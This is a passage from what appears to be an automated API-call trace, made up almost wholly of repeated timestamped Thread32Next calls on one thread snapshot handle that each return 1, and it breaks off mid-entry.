lpte=0x14fe78) returned 1 [0230.760] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.761] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.762] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.763] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.764] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.764] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.765] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.766] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.767] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.767] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.768] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.769] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.769] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.770] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.771] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.772] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.773] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.773] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.774] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.775] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.776] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.776] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.777] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.778] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.779] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.780] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.780] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.781] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.782] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.783] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.783] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.058] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.059] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.061] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.061] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.062] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.063] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.064] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.065] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.066] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.067] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.068] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.069] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.071] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.071] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.072] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.074] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.075] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.076] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.079] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.336] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.336] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.340] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.340] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.341] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.342] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.342] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.344] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.347] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.356] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.391] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.391] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.392] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.392] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.393] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.394] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.395] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.396] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.396] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.397] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.398] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.398] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.399] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.400] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.401] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.402] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.403] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.403] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.404] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.636] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.636] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.638] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.641] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.641] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.657] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.657] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.662] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.662] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.663] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.664] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.665] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.665] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.666] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.667] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.667] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.668] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.670] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.946] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.947] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.947] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.948] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.949] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.949] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.950] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.951] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.951] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.952] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.953] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.953] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.954] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.955] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.956] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.956] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.957] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.957] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.958] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.959] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.959] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.960] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.960] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.961] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.962] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.962] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.964] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.965] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.965] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.966] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.966] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.967] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.969] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.969] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.970] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.970] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.971] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.971] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.972] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.973] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.973] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.974] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.975] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.975] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.976] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.977] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.977] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.978] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.978] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.979] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.980] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0231.981] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.267] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.269] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.271] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.272] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.273] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.274] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.274] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.275] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.276] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.277] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.278] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.279] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.310] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.313] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.314] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.316] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.317] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.626] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.627] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.627] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.629] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.630] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.630] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.631] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.631] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.633] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.633] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.634] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.635] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.636] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.638] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.641] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.641] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.657] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.662] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.929] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.944] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0232.946] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.521] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.536] Thread32Next 